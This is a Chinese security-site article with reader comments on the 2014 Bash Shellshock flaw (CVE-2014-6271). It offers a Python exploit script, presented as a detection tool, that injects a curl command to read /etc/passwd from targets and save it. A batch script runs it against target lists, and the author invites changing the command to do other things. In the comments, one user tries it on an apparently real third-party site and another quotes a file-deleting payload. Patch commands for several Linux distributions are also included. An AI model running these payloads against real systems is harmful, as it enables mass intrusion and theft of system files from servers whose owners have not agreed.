bash 漏洞

bash 漏洞
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Bash漏洞批量检测工具与修复方案 ziwen认证厂商2014-09-28金币奖励+8共649806人围观 ，发现 62 个不明物体 工具漏洞
ShellShock

Linux官方内置Bash中新发现一个非常严重安全漏洞，黑客可以利用该Bash漏洞完全控制目标系统并发起攻击。

Bash远程命令执行漏洞（CVE2014-6271）检测脚本

作者:ziwen（dn8.net团队）

运行环境：python 2.7‍‍

#!/usr/bin/env python
#coding:utf-8
import os
import sys
import re
print "f4ck ziwen cve 2014 6271 exp attacking!"
if sys.argv[1].startswith('-'):
option = sys.argv[1][1:]
if option == 'url':
b=sys.argv[2]
if not re.match("http",sys.argv[2]):
print "URL格式错误 正确格式例如http://www.baidu.com/1.cgi"

else:
out=re.sub("\.|\/","",b)
out=out[7:]
print "shahdashhdd",out,b
a="curl -H \'x: () { :;};a=`/bin/cat /etc/passwd`;echo \"a: $a\"' '"+b+"' -I -o "+out+"\"output\".txt"
os.system(a)
f = open(out+"output.txt", 'r')
a=f.read()
if re.search("root|bin\/bash",a):
print "target possible have bug under is *nix passwd file"
print a
else:
f.close()
os.remove(out+"output.txt")
print "possible dont have bug! or have a waf!"
else:
print "error! U can email to me U question (ziwen@21.wf)"
print option
下载地址

脚本会将结果回显出来 如果存在漏洞的话还会把passwd文件保存在以目标域名+output命名的txt文档里，不成功不保存

执行方法

python c:\exp.py -url
http://23.239.208.105/cgi-bin/poc.cgi
批量检测是否存在Bash远程命令执行漏洞

#!/usr/bin/env python
#coding:utf-8
import os
import sys
PATH=sys.path[0]+"/"
text=open(PATH+"target.txt",'r')
for line in text:
print line
os.system("python "+PATH+"exp.py -url "+line)
下载地址

该脚本调用了上面那个EXP 所以请运行该脚本时请将两个脚本放同一目录 并在该目录下新建target.txt文件将您的目标列表放进文件里
如：
http://www.baidu.com
http://23.239.208.105/cgi-bin/poc.cgi
然后运行该脚本即可 该脚本便会自动按顺序检测 会把结果回显出来 并会把成功的目标的passwd文件保存在 以目标域名+output命名的txt文档里，不成功不保存

请不要随意改变exp.py的文件名 如果改变了EXP.PY的文件名请将batch.py里面的exp.py改为您修改的文件名 否则batch.py会运行失败

其他

linux如果用不了上面那个版本请试下这个Linux专版
http://pan.baidu.com/s/1hq7oCYw
windows用不了请试试下面这个windows专版
http://pan.baidu.com/s/1kTmjNKV

如果需要生成其他文件或者利用漏洞做其他事请自行修改脚本中的curl命令
个别报错报CURL命令错误的是CURL版本问题，不是我脚本问题，我这边多个基友都测试了无误

漏洞修复方案

请您根据Linux版本选择您需要修复的命令， 为了防止意外情况发生，建议您执行命令前先对Linux服务器系统盘打个快照，如果万一出现升级影响您服务器使用情况，可以通过回滚系统盘快照解决。

centos:(最终解决方案)

yum clean all
yum makecache
yum -y update bash
ubuntu:(最终解决方案)

apt-get update
apt-get -y install --only-upgrade bash
debian:(最终解决方案)

7.5 64bit && 32bit

apt-get update
apt-get -y install --only-upgrade bash
6.0.x 64bit

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_amd64.deb && dpkg -i bash_4.1-3+deb6u2_amd64.deb
6.0.x 32bit

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_i386.deb && dpkg -i bash_4.1-3+deb6u2_i386.deb
aliyun linux:(最终解决方案)
5.x 64bit

wget http://mirrors.aliyun.com/centos/5/updates/x86_64/RPMS/bash-3.2-33.el5_10.4.x86_64.rpm && rpm -Uvh bash-3.2-33.el5_10.4.x86_64.rpm
5.x 32bit

wget http://mirrors.aliyun.com/centos/5/updates/i386/RPMS/bash-3.2-33.el5_10.4.i386.rpm && rpm -Uvh bash-3.2-33.el5_10.4.i386.rpm
opensuse:(最终解决方案)

zypper clean
zypper refresh
zypper update -y bash
[参考信息来源：http://bbs.aliyun.com/read/176977.html?spm=5176.7189909.3.15.sZTgst,转载请注明来自FreeBuf.COM]

ziwen
ziwen
5 篇文章
等级： 4级
||
上一篇：Bash漏洞引发僵尸网络狂欢下一篇：Bash漏洞再次演进：缓冲区溢出导致远程任意命令执行
这些评论亮了

Halo 回复
@ziwen 呵呵，本来不想喷的，你一说我倒想说几句了，调用个系统命令也叫python？呵呵呵呵，直接cat password文件然后查找是否有root特征也叫漏洞？呵呵呵，让我来普及你幼小的心灵，并不是每个cgi都会输出，就算想做，也得做的漂亮点再拿出来吧，人得虚心懂吗？对了，路过的fb友告诉我，约架哪家强？！
)80(亮了
发表评论已有 62 条评论

softbug 认证作者专栏作者(7级) i am here! 2014-09-28回复 1楼
centos 6.x 5.x 的bash修复后的rpm包，谁可以给一个地址。

亮了(3)

c4bbage 2014-09-28回复
@softbug

亮了(2)

c4bbage 2014-09-28回复
@softbug wget http://mirrors.aliyun.com/centos/5/updates/i386/RPMS/bash-3.2-33.el5_10.4.i386.rpm&&rpm -Uvh bash-3.2-33.el5_10.4.i386.rpm

wget http://mirrors.aliyun.com/centos/6/updates/x86_64/Packages/bash-4.1.2-15.el6_5.2.x86_64.rpm&& rpm -Uvh bash-4.1.2-15.el6_5.2.x86_64.rpm

亮了(2)

MeirLin (5级) 研表究明，汉字的序顺并不定一能影阅响读，比如当你看完这句话后... 2014-09-28回复 2楼
OSX呢？

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@MeirLin OSX直接用文中的脚本就可以 绝对无误 因为我本机就是OSX

亮了(2)

Halo 2014-09-28回复 3楼
我代码写得少你可别骗我

亮了(3)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@Halo 懂Python的不需要解释 不懂的解释也解释不通

亮了(2)

好羡慕大神啊 2017-02-12回复
@ ziwen 这种说法好酷啊 张同学

那你能告诉我 为什么不用shell script来解决这个问题而要用python呢？可以谈一下你的远见么？难道是我们的张小朋友过于强大不屑于用shell这种弱爆了的东西？

亮了(1)

zglxw (4级) 2014-09-28回复 4楼

亮了(2)

10086 2014-09-28回复 5楼
明明一个文件就可以解决的事情，非要弄两个粗出！

亮了(3)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@10086 这是批量和检测两个功能 弄两个方便用 请不要乱喷

亮了(2)

Halo 2014-09-29回复
@ziwen 呵呵，本来不想喷的，你一说我倒想说几句了，调用个系统命令也叫python？呵呵呵呵，直接cat password文件然后查找是否有root特征也叫漏洞？呵呵呵，让我来普及你幼小的心灵，并不是每个cgi都会输出，就算想做，也得做的漂亮点再拿出来吧，人得虚心懂吗？对了，路过的fb友告诉我，约架哪家强？！

亮了(80)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@Halo 您真厉害您真吊 欢迎您来发文章 而不是只在这喷

亮了(2)

f4ck 2014-10-06回复
@Halo 挖掘机技术到底哪家强？

亮了(1)

linso (2级) 欢迎关注我的微博、知乎、Twitter、csdn 2014-09-29回复
你是河蟹派来的么？

亮了(1)

Fiend520 (7级) 2014-09-28回复 6楼
C:\Users\HAWK>python C:\Users\HAWK\Desktop\bashceshi\exp.py http://contest.japia

s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi

f4ck ziwen cve 2014 6271 exp attacking!

这算成功了吗？

亮了(1)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@Fiend520 成功会回显passwd文件

亮了(1)

Fiend520 (7级) 2014-09-28回复
@ziwen 不好意思，我刚刚接触python，还不是太懂，我这样应用对吗？

亮了(2)

ziwen 2014-09-28回复
@Fiend520 是否报错了？

亮了(1)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@Fiend520 有没有报错？

亮了(2)

Fiend520 (7级) 2014-09-28回复
@ziwen 我运行的这个C:\Users\HAWK>python C:\Users\HAWK\Desktop\bashceshi\exp.py http://contest.japia s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi

显示这个

f4ck ziwen cve 2014 6271 exp attacking!

亮了(1)

ziwen 2014-09-28回复
@Fiend520 不显示别的？

亮了(2)

Fiend520 (7级) 2014-09-29回复
@ziwen 不显示其他的。难道我的命令有错误，那个-url是必须添加的吗？我尝试过添加-url 以后显示不是内部命令。其余的没有任何显示。

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@Fiend520 url当然要添加 要不然没有目标

亮了(1)

Fiend520 (7级) 2014-09-29回复
@ziwen 我添加url了，你看我的操作命令是 python C:\Users\HAWK\Desktop\bashceshi\exp.py http://contest.japia s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi我把你编写的exp放到了C:\Users\HAWK\Desktop\bashceshi\里，http://contest.japia s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi这个是目标，我的意思是在这个目标之前要不要添加 -url这个命令

亮了(1)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@Fiend520 要的

亮了(2)

Fiend520 (7级) 2014-09-29回复
@ziwen 可是我一添加，一运行命令就显示 -url 不是内部命令，擦，是我太笨了还是没有配置好呢

亮了(1)

ziwen 认证厂商(4级) 环宇繁星 2014-09-30回复
@Fiend520 不能把 应该还是您没有配置好 要不您加我QQ吧 ziwen@21.wf

亮了(1)

xxx (2级) 2014-09-28回复 7楼
yum update bash是要重启？好像rpm安装不用.

亮了(2)

看看1 2014-09-28回复 8楼
有没有使用成功的？ 完全用不了啊 我了个去 回显要不就是 f4ck ziwen cve 2014 6271 exp attacking! 一句广告 要不就是 SyntaxError: invalid syntax 语法错误 完全没有在目录里生成任何东西，有成功的烦请告知一声。

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@看看1 那不是广告好吗 而且我也注明了为什么会报错和报错的解决办法 你不会Python不要乱喷好吗

亮了(1)

goodgoodstudy 2014-09-28回复
@看看1 cetos上Python2.6+curl7.19版本OK

亮了(2)

黑黑的白猫 (2级) 2014-09-28回复 9楼
技术提高了不少

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@黑黑的白猫 谢谢

亮了(2)

ln1901 (1级) 2014-09-28回复 10楼
楼主你能确定那些修复方案是最终的吗？

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-28回复
@ln1901 只是修复CVE20146271的

亮了(2)

ln1901 (1级) 2014-09-28回复 11楼
现在又出现了CVE-2014-7186，CVE-2014-7187，详见https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00238.html，貌似bash 4.3.26修复不了CVE-2014-7186

亮了(1)

钻地球的 2014-09-28回复 12楼
Shellshock。公布漏洞只会让更多“黑客”获得新的手段，而真正会去补漏的少！

亮了(1)

集齐好人卡的rootoorotor 2014-09-28回复 13楼
赞！

亮了(1)

Netf 2014-09-28回复 14楼
没搞，最近不在研究这个。

亮了(1)

阿伦aka挨踢民工 2014-09-28回复 15楼
研究啥？工控系统漏洞？

亮了(1)

王思聪 2014-09-29回复 16楼
可以加个参数 –url 单个，，，–file 批量，，，，，

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@王思聪 恩恩 是个好主意

亮了(1)

cainiao 2014-09-29回复 17楼
多谢分享。

亮了(1)

无丶花 (2级) FB客服MM的男朋友。 2014-09-29回复 18楼
玩得真不错！会玩的！

亮了(1)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@无丶花 额？

亮了(1)

linso (2级) 欢迎关注我的微博、知乎、Twitter、csdn 2014-09-29回复 19楼
能不能录制一个安装和使用的视频啊？这写的有点乱

亮了(1)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@linso 录视频可以但每种环境的使用过程都不一样 例如LINUX直接就可以运行 win却要安装CURL 很纠结

亮了(1)

coffice (1级) 2017-11-01回复
@ ziwen 这个exp在读一个不存在的文件的时候 没有做异常抛出？？

f = open(out+"output.txt", ‘r’)

亮了(1)

hang333 (4级) 2014-09-29回复 20楼
你不应该调用个系统命令呀 ==

亮了(2)

ziwen 认证厂商(4级) 环宇繁星 2014-09-29回复
@hang333 头像不错 赞

亮了(2)

hang333 (4级) 2014-10-05回复
@ziwen …

亮了(2)

hang333 (4级) 2014-10-06回复
@ziwen 我的头像是个男的

亮了(2)

0xExploit (3级) 2014-09-29回复 21楼
我有个问题，我把exp：curl -H ‘x: () { :;};a=`/bin/cat /etc/passwd`;echo $a’ http://172.16.229.146/cgi-bin/poc.cgi -I -o "/Users/0xExploit/Desktop/output.txt"执行，可以在output.txt中看到结果。但是执行curl -H ‘x: () { :;};a=`/bin/cat /etc/passwd`;echo $a’ http://172.16.229.146/cgi-bin/poc.cgi却不返回结果。。这个表示不懂。。

另外看wooyun的这个exp：curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi。也没侧成功。。

感谢解答。

亮了(1)

ziwen 2014-09-30回复
@0xExploit 对不起是我考虑不周 所以要修改命令可能还要改正则 下次码代码时我会注意的 嘿嘿。。。

亮了(1)

wangx 2014-09-29回复 22楼
一定要写英文提示才牛逼吗.

亮了(2)

ziwen 2014-09-30回复
@wangx 一定要用英文ID才牛比吗

亮了(2)

青衫 (1级) 2014-09-30回复 23楼
redhat没有嘛

亮了(1)

qwerty (1级) xyz 2014-09-30回复 24楼
路过 学习了

http://cih.so/?p=754

亮了(2)

ziwen 2014-10-03回复
@qwerty 交个朋友吧大牛

亮了(0)

啊啊啊啊 2014-10-08回复 25楼
大神在这 我擦 牛xx的

亮了(0)

微雨独行 2014-12-11回复 26楼
路过,表示小白文

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
ziwen
ziwen认证厂商

环宇繁星

5
文章数
111
评论数
最近文章
浅析点击劫持攻击
2015.05.21

Bash漏洞批量检测工具与修复方案
2014.09.28

安全科普：浅谈沙盒防御APT攻击
2013.12.10

浏览更多
相关阅读
vFeed：结构化的漏洞与威胁数据库（支持CVE、CWE和OVAL）CVE申请的那些事CVE格式即将改变Android是今年的漏洞之王？CVE Details的数据根本就不靠谱！Bash漏洞批量检测工具与修复方案
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php0daybank